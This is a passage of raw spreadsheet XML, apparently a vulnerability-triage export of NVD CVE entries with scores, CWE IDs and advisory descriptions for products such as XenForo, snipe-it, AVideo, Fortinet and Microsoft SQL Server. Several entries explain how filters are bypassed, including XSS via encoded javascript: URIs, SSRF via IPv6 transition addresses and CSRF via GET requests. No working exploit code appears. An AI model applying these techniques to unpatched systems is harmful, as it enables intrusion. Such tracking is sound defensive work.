t="inlineStr"><is><t>NVD</t></is></c><c r="O1463" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1463" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1463" s="5" t="inlineStr" /><c r="R1463" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1463" s="5" t="inlineStr"><is><t>PX4 Autopilot through 1.17.0 contains a stack buffer over-read vulnerability in the netman system command that fails to validate interface name length. Attackers can supply interface names of 74 bytes or more via the -i option to read beyond buffer boundaries, leaking stack memory to console output or writing it into persistent network configuration files.</t></is></c><c r="T1463" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86714</t></is></c></row><row r="1464"><c r="A1464" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1464" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1464" s="5" t="inlineStr"><is><t>CVE-2026-86719</t></is></c><c r="D1464" s="5" t="n"><v>5.3</v></c><c r="E1464" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1464" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1464" s="5" t="inlineStr" /><c r="H1464" s="5" t="n"><v>0.001</v></c><c r="I1464" s="5" t="inlineStr" /><c r="J1464" s="5" t="inlineStr" /><c r="K1464" s="5" t="inlineStr" /><c r="L1464" s="5" t="inlineStr" /><c r="M1464" s="5" t="inlineStr" /><c r="N1464" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1464" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1464" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1464" s="5" t="inlineStr" /><c r="R1464" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1464" s="5" t="inlineStr"><is><t>WWBN AVideo through commit c3edcc274c389816d434acadac07ee78eaf330c1 (master) contains a cross-site request forgery vulnerability in the CustomizeUser plugin endpoint plugin/CustomizeUser/swapUser.json.php. The endpoint takes users_id from $_REQUEST and invokes User::swapUser() without calling forbidIfNotPost() or forbidIfInvalidToken(), and the global autoCSRFGuard() check only runs for POST requests to *.json.php, so the action is reachable via GET. An attacker who causes an authenticated administrator's browser to issue a cross-origin GET (for example via an &lt;img&gt; tag or link) can replace that administrator's session with a non-admin user account, causing the administrator to lose administrative access until the swap is cancelled; swapping to another administrator account is rejected, so this is not privilege escalation. The JSON response also discloses the session_id. The CustomizeUser plugin is enabled by default, and no patch was available at the time of publication.</t></is></c><c r="T1464" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86719</t></is></c></row><row r="1465"><c r="A1465" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1465" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1465" s="5" t="inlineStr"><is><t>CVE-2026-86737</t></is></c><c r="D1465" s="5" t="n"><v>5.3</v></c><c r="E1465" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1465" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1465" s="5" t="inlineStr" /><c r="H1465" s="5" t="n"><v>0.002</v></c><c r="I1465" s="5" t="inlineStr" /><c r="J1465" s="5" t="inlineStr" /><c r="K1465" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L1465" s="5" t="inlineStr" /><c r="M1465" s="5" t="inlineStr" /><c r="N1465" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1465" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1465" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1465" s="5" t="inlineStr" /><c r="R1465" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1465" s="5" t="inlineStr"><is><t>snipe-it versions before 8.7.0 fail to enforce asset view authorization in the GET /hardware/{asset}/barcode endpoint. Authenticated attackers can iterate asset IDs to retrieve barcodes and enumerate asset tags across tenants, including soft-deleted and cross-company assets.</t></is></c><c r="T1465" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86737</t></is></c></row><row r="1466"><c r="A1466" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1466" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1466" s="5" t="inlineStr"><is><t>CVE-2026-11891</t></is></c><c r="D1466" s="5" t="n"><v>5.1</v></c><c r="E1466" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1466" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1466" s="5" t="inlineStr" /><c r="H1466" s="5" t="n"><v>0.001</v></c><c r="I1466" s="5" t="inlineStr" /><c r="J1466" s="5" t="inlineStr" /><c r="K1466" s="5" t="inlineStr" /><c r="L1466" s="5" t="inlineStr" /><c r="M1466" s="5" t="inlineStr" /><c r="N1466" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1466" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1466" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1466" s="5" t="inlineStr" /><c r="R1466" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1466" s="5" t="inlineStr"><is><t>Use After Free vulnerability in Arm Ltd Valhall GPU Userspace Driver, Arm Ltd Arm 5th Gen GPU Architecture Userspace Driver allows a non-privileged user process to perform valid GPU processing operations, including via WebGL or WebGPU, to access already freed memory.



This issue affects Valhall GPU Userspace Driver: from r46p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Userspace Driver: from r46p0 through r49p5, from r50p0 through r54p3, r55p0.</t></is></c><c r="T1466" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-11891</t></is></c></row><row r="1467"><c r="A1467" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1467" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1467" s="5" t="inlineStr"><is><t>CVE-2026-12387</t></is></c><c r="D1467" s="5" t="n"><v>5.1</v></c><c r="E1467" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1467" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1467" s="5" t="inlineStr" /><c r="H1467" s="5" t="n"><v>0.001</v></c><c r="I1467" s="5" t="inlineStr" /><c r="J1467" s="5" t="inlineStr" /><c r="K1467" s="5" t="inlineStr" /><c r="L1467" s="5" t="inlineStr" /><c r="M1467" s="5" t="inlineStr" /><c r="N1467" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1467" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1467" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1467" s="5" t="inlineStr" /><c r="R1467" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1467"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r41p0 through r49p5, from r50p0 through r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r41p0 through r49p5, from r50p0 through r54p3, r55p0.</t></is></c><c r="T1467" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12387</t></is></c></row><row r="1468"><c r="A1468" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1468" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1468" s="5" t="inlineStr"><is><t>CVE-2026-33387</t></is></c><c r="D1468" s="5" t="n"><v>5.1</v></c><c r="E1468" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1468" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1468" s="5" t="inlineStr" /><c r="H1468" s="5" t="n"><v>0.002</v></c><c r="I1468" s="5" t="inlineStr" /><c r="J1468" s="5" t="inlineStr" /><c r="K1468" s="5" t="inlineStr" /><c r="L1468" s="5" t="inlineStr" /><c r="M1468" s="5" t="inlineStr" /><c r="N1468" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1468" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1468" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1468" s="5" t="inlineStr" /><c r="R1468" s="5" t="inlineStr"><is><t>CWE-1336</t></is></c><c r="S1468" s="5" t="inlineStr"><is><t>A template injection vulnerability was discovered in the Dashboards functionality due to improper validation of an input parameter. An authenticated user with the required privileges can define a dashboard containing a malicious payload, or a victim can be socially engineered into importing a malicious dashboard. When the victim views or imports the dashboard, the payload executes in their browser context, allowing the attacker to modify application data or disrupt application availability.</t></is></c><c r="T1468" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33387</t></is></c></row><row r="1469"><c r="A1469" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1469" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1469" s="5" t="inlineStr"><is><t>CVE-2026-33920</t></is></c><c r="D1469" s="5" t="n"><v>5.1</v></c><c r="E1469" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1469" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1469" s="5" t="inlineStr" /><c r="H1469" s="5" t="n"><v>0.001</v></c><c r="I1469" s="5" t="inlineStr" /><c r="J1469" s="5" t="inlineStr" /><c r="K1469" s="5" t="inlineStr" /><c r="L1469" s="5" t="inlineStr" /><c r="M1469" s="5" t="inlineStr" /><c r="N1469" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1469" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1469" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1469" s="5" t="inlineStr" /><c r="R1469" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S1469" s="5" t="inlineStr"><is><t>A cross-site request forgery vulnerability was discovered in the login functionality (both standard and SAML) due to missing validation of the anti-CSRF token. An attacker with a valid account can trick a victim into unknowingly authenticating with the attacker's credentials. Any operation performed by the victim in this state is attributed to the attacker's account, compromising the integrity of the audit trail.</t></is></c><c r="T1469" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33920</t></is></c></row><row r="1470"><c r="A1470" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1470" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1470" s="5" t="inlineStr"><is><t>CVE-2026-73317</t></is></c><c r="D1470" s="5" t="n"><v>5.1</v></c><c r="E1470" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1470" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1470" s="5" t="inlineStr" /><c r="H1470" s="5" t="n"><v>0.003</v></c><c r="I1470" s="5" t="inlineStr" /><c r="J1470" s="5" t="inlineStr" /><c r="K1470" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1470" s="5" t="inlineStr" /><c r="M1470" s="5" t="inlineStr" /><c r="N1470" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1470" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1470" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1470" s="5" t="inlineStr" /><c r="R1470" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1470" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a missing authorization vulnerability in the ACP cache-rebuild dispatcher that allows limited administrators with only the rebuildCache permission to perform unauthorized approval queue actions by supplying an arbitrary job class and actor user ID in the POST body. Attackers can invoke the approval queue job under any user identity to approve queued user registrations without holding the required approval-queue or moderator permissions, causing the moderation log to attribute actions to an impersonated account.</t></is></c><c r="T1470" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73317</t></is></c></row><row r="1471"><c r="A1471" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1471" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1471" s="5" t="inlineStr"><is><t>CVE-2026-73318</t></is></c><c r="D1471" s="5" t="n"><v>5.1</v></c><c r="E1471" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1471" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1471" s="5" t="inlineStr" /><c r="H1471" s="5" t="n"><v>0.003</v></c><c r="I1471" s="5" t="inlineStr" /><c r="J1471" s="5" t="inlineStr" /><c r="K1471" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1471" s="5" t="inlineStr" /><c r="M1471" s="5" t="inlineStr" /><c r="N1471" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1471" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1471" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q1471" s="5" t="inlineStr" /><c r="R1471" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1471" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a missing authorization vulnerability in the force-agreement controller that allows any ACP administrator to access and submit force-agreement forms regardless of their assigned permissions. Attackers can bypass the option permission declared in the navigation configuration to update the global policy last-updated timestamp, forcing all users to re-agree to the privacy policy or terms of service.</t></is></c><c r="T1471" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73318</t></is></c></row><row r="1472"><c r="A1472" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1472" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1472" s="5" t="inlineStr"><is><t>CVE-2026-73319</t></is></c><c r="D1472" s="5" t="n"><v>5.1</v></c><c r="E1472" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1472" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1472" s="5" t="inlineStr" /><c r="H1472" s="5" t="n"><v>0.003</v></c><c r="I1472" s="5" t="inlineStr" /><c r="J1472" s="5" t="inlineStr" /><c r="K1472" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1472" s="5" t="inlineStr" /><c r="M1472" s="5" t="inlineStr" /><c r="N1472" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1472" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1472" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1472" s="5" t="inlineStr" /><c r="R1472" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1472" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains a cross-site scripting vulnerability in the dynamic redirect handler that allows unauthenticated attackers to execute arbitrary JavaScript in the board origin by crafting a malicious javascript: URI that bypasses host validation. Attackers can embed the board hostname in the URI authority component and use percent-encoded newlines to evade server-side filters, causing authenticated users who perform a Follow action to execute attacker-supplied JavaScript in their browser.</t></is></c><c r="T1472" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73319</t></is></c></row><row r="1473"><c r="A1473" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1473" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1473" s="5" t="inlineStr"><is><t>CVE-2026-73320</t></is></c><c r="D1473" s="5" t="n"><v>5.1</v></c><c r="E1473" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1473" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1473" s="5" t="inlineStr" /><c r="H1473" s="5" t="n"><v>0.003</v></c><c r="I1473" s="5" t="inlineStr" /><c r="J1473" s="5" t="inlineStr" /><c r="K1473" s="5" t="inlineStr"><is><t>xenforo:xenforo</t></is></c><c r="L1473" s="5" t="inlineStr" /><c r="M1473" s="5" t="inlineStr" /><c r="N1473" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1473" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1473" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1473" s="5" t="inlineStr" /><c r="R1473" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S1473" s="5" t="inlineStr"><is><t>XenForo before 2.3.13 contains an unauthenticated information disclosure vulnerability that allows unauthenticated attackers to retrieve private unfurl records by supplying predictable auto-increment primary key IDs to the unfurl endpoint. Attackers can enumerate or predict result IDs and query the endpoint without any session, user, or visibility checks to obtain rendered preview HTML, original URLs, and query strings from private conversations and other restricted content.</t></is></c><c r="T1473" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73320</t></is></c></row><row r="1474"><c r="A1474" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1474" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1474" s="5" t="inlineStr"><is><t>CVE-2026-84386</t></is></c><c r="D1474" s="5" t="n"><v>5.1</v></c><c r="E1474" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1474" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1474" s="5" t="inlineStr" /><c r="H1474" s="5" t="n"><v>0.001</v></c><c r="I1474" s="5" t="inlineStr" /><c r="J1474" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1474" s="5" t="inlineStr" /><c r="L1474" s="5" t="inlineStr" /><c r="M1474" s="5" t="inlineStr" /><c r="N1474" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1474" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1474" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1474" s="5" t="inlineStr" /><c r="R1474" s="5" t="inlineStr"><is><t>CWE-283</t></is></c><c r="S1474" s="5" t="inlineStr"><is><t>A unverified ownership vulnerability in Fortinet FortiClientWindows 7.4.0 through 7.4.7, FortiClientWindows 7.2 all versions may allow attacker to improper access control via &lt;insert attack vector here&gt;</t></is></c><c r="T1474" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84386</t></is></c></row><row r="1475"><c r="A1475" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1475" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1475" s="5" t="inlineStr"><is><t>CVE-2026-86516</t></is></c><c r="D1475" s="5" t="n"><v>5.1</v></c><c r="E1475" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1475" s="5" t="inlineStr"><is><t>cna@vuldb.com</t></is></c><c r="G1475" s="5" t="inlineStr" /><c r="H1475" s="5" t="n"><v>0.002</v></c><c r="I1475" s="5" t="inlineStr" /><c r="J1475" s="5" t="inlineStr" /><c r="K1475" s="5" t="inlineStr" /><c r="L1475" s="5" t="inlineStr" /><c r="M1475" s="5" t="inlineStr" /><c r="N1475" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1475" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1475" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1475" s="5" t="inlineStr" /><c r="R1475" s="5" t="inlineStr"><is><t>CWE-266, CWE-269</t></is></c><c r="S1475" s="5" t="inlineStr"><is><t>A vulnerability was detected in elenavanengelenmaslova mocknest-serverless 0.9.0. The affected element is an unknown function of the file deployment/aws/shared/github-oidc-role.yaml of the component AWS GitHub OIDC Deployment Helper Script. Performing a manipulation results in improper privilege management. It is possible to initiate the attack remotely. The patch is named 6ab3147282d867c1993f995272750db091c2290b. Applying a patch is the recommended action to fix this issue.</t></is></c><c r="T1475" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86516</t></is></c></row><row r="1476"><c r="A1476" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1476" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1476" s="5" t="inlineStr"><is><t>CVE-2026-72976</t></is></c><c r="D1476" s="5" t="n"><v>5</v></c><c r="E1476" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1476" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1476" s="5" t="inlineStr" /><c r="H1476" s="5" t="n"><v>0.004</v></c><c r="I1476" s="5" t="inlineStr" /><c r="J1476" s="5" t="inlineStr" /><c r="K1476" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1476" s="5" t="inlineStr" /><c r="M1476" s="5" t="inlineStr" /><c r="N1476" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1476" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1476" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1476" s="5" t="inlineStr" /><c r="R1476" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1476" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an authorized attacker to disclose information locally.</t></is></c><c r="T1476" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72976</t></is></c></row><row r="1477"><c r="A1477" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1477" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1477" s="5" t="inlineStr"><is><t>CVE-2026-78635</t></is></c><c r="D1477" s="5" t="n"><v>5</v></c><c r="E1477" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1477" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1477" s="5" t="inlineStr" /><c r="H1477" s="5" t="n"><v>0.002</v></c><c r="I1477" s="5" t="inlineStr" /><c r="J1477" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1477" s="5" t="inlineStr" /><c r="L1477" s="5" t="inlineStr" /><c r="M1477" s="5" t="inlineStr" /><c r="N1477" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1477" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1477" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1477" s="5" t="inlineStr" /><c r="R1477" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="S1477" s="5" t="inlineStr"><is><t>The Okta Privileged Access client URL handler does not insert an option terminator before appending the target value to the command-line arguments. When a scaleft:// protocol handler link contains a value beginning with a hyphen, the underlying CLI framework interprets it as a command-line flag, causing unintended modification of the SSH client's behavior.</t></is></c><c r="T1477" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78635</t></is></c></row><row r="1478"><c r="A1478" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1478" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1478" s="5" t="inlineStr"><is><t>CVE-2026-79904</t></is></c><c r="D1478" s="5" t="n"><v>5</v></c><c r="E1478" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1478" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1478" s="5" t="inlineStr" /><c r="H1478" s="5" t="n"><v>0.001</v></c><c r="I1478" s="5" t="inlineStr" /><c r="J1478" s="5" t="inlineStr" /><c r="K1478" s="5" t="inlineStr"><is><t>adobe:photoshop_mobile</t></is></c><c r="L1478" s="5" t="inlineStr" /><c r="M1478" s="5" t="inlineStr" /><c r="N1478" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1478" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1478" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1478" s="5" t="inlineStr" /><c r="R1478" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S1478" s="5" t="inlineStr"><is><t>Photoshop Mobile is affected by an Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability that could result in a Security feature bypass. A low-privileged attacker could leverage this vulnerability to access unauthorized files or directories outside the intended restrictions. Exploit depends on conditions beyond the attacker's control. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T1478" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79904</t></is></c></row><row r="1479"><c r="A1479" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1479" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1479" s="5" t="inlineStr"><is><t>CVE-2026-86735</t></is></c><c r="D1479" s="5" t="n"><v>5</v></c><c r="E1479" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1479" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1479" s="5" t="inlineStr" /><c r="H1479" s="5" t="n"><v>0.002</v></c><c r="I1479" s="5" t="inlineStr" /><c r="J1479" s="5" t="inlineStr" /><c r="K1479" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L1479" s="5" t="inlineStr" /><c r="M1479" s="5" t="inlineStr" /><c r="N1479" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1479" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1479" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1479" s="5" t="inlineStr" /><c r="R1479" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S1479" s="5" t="inlineStr"><is><t>snipe-it versions before 8.7.0 contain a server-side request forgery vulnerability in the ExternalUrl validation rule that fails to detect IPv6 transition addresses encoding private IPv4 targets. Attackers with super-admin privileges can configure webhook URLs using NAT64, 6to4, or Teredo transition addresses to bypass SSRF guards and access internal services or cloud metadata endpoints.</t></is></c><c r="T1479" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86735</t></is></c></row><row r="1480"><c r="A1480" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1480" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1480" s="5" t="inlineStr"><is><t>CVE-2026-22575</t></is></c><c r="D1480" s="5" t="n"><v>4.9</v></c><c r="E1480" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1480" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1480" s="5" t="inlineStr" /><c r="H1480" s="5" t="n"><v>0.002</v></c><c r="I1480" s="5" t="inlineStr" /><c r="J1480" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1480" s="5" t="inlineStr" /><c r="L1480" s="5" t="inlineStr" /><c r="M1480" s="5" t="inlineStr" /><c r="N1480" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1480" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1480" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1480" s="5" t="inlineStr" /><c r="R1480" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S1480" s="5" t="inlineStr"><is><t>An improper access control vulnerability in Fortinet FortiManager 7.6.0 through 7.6.4, FortiManager 7.4.0 through 7.4.10, FortiManager 7.2 all versions, FortiManager Cloud 7.6.2 through 7.6.4, FortiManager Cloud 7.4.1 through 7.4.10, FortiManager Cloud 7.2 all versions may allow an administrator to bypass the approval process for workflow sessions via crafted HTTP or HTTPs requests.</t></is></c><c r="T1480" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-22575</t></is></c></row><row r="1481"><c r="A1481" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1481" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1481" s="5" t="inlineStr"><is><t>CVE-2026-68785</t></is></c><c r="D1481" s="5" t="n"><v>4.9</v></c><c r="E1481" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1481" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1481" s="5" t="inlineStr" /><c r="H1481" s="5" t="n"><v>0.008</v></c><c r="I1481" s="5" t="inlineStr" /><c r="J1481" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1481" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1481" s="5" t="inlineStr" /><c r="M1481" s="5" t="inlineStr" /><c r="N1481" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1481" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1481" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q1481" s="5" t="inlineStr" /><c r="R1481" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1481" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t></is></c><c r="T1481" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68785</t></is></c></row><row r="1482"><c r="A1482" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1482" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1482" s="5" t="inlineStr"><is><t>CVE-2026-78624</t></is></c><c r="D1482" s="5" t="n"><v>4.9</v></c><c r="E1482" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1482" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1482" s="5" t="inlineStr" /><c r="H1482" s="5" t="n"><v>0.004</v></c><c r="I1482" s="5" t="inlineStr" /><c r="J1482" s="5" 